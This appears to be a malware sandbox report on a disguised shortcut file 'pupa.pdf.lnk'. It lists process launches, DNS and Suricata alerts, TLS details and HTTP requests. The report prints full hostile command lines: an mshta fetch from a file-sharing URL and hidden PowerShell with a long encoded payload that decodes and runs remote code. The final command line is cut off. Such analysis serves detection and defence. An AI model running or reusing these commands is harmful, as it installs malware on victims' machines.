Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 2, 2025, 8:52 a.m. | May 2, 2025, 8:54 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\pupa.pdf.lnk
2556-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77')
2668-
mshta.exe "C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77
2824-
cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
3000-
powershell.exe powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA=
3068
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
dc438.4sync.com | 199.101.133.66 | |
www.4sync.com | 199.101.134.238 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2055337 | ET INFO File Sharing Related Domain in DNS Lookup (4sync .com) | Misc activity |
UDP 192.168.56.101:54148 -> 164.124.101.2:53 | 2055337 | ET INFO File Sharing Related Domain in DNS Lookup (4sync .com) | Misc activity |
TCP 192.168.56.101:49167 -> 204.155.149.140:443 | 2055338 | ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI | Misc activity |
TCP 192.168.56.101:49167 -> 204.155.149.140:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49169 -> 199.101.133.66:443 | 2055338 | ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI | Misc activity |
TCP 192.168.56.101:49169 -> 199.101.133.66:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49169 -> 199.101.133.66:443 | 2055338 | ET INFO Observed File Sharing Related Domain (4sync .com) in TLS SNI | Misc activity |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49167 204.155.149.140:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | CN=*.4sync.com | 79:05:c7:c6:c9:8f:a1:23:11:21:c5:5c:69:e4:ec:91:a6:9c:71:0b |
TLSv1 192.168.56.101:49169 199.101.133.66:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | CN=*.4sync.com | 79:05:c7:c6:c9:8f:a1:23:11:21:c5:5c:69:e4:ec:91:a6:9c:71:0b |
request | GET https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77 |
request | GET https://dc438.4sync.com/download/gPp9O6FS/pupa.html?dsid=LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77&sbsr=b53cf2d6dee9ce9b8ba3d0c01f4b8732b47&bip=MTIxLjEzMy4xMjguMQ&lgfp=40 |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\pupa.pdf.lnk |
cmdline | mshta https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77 |
cmdline | powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAM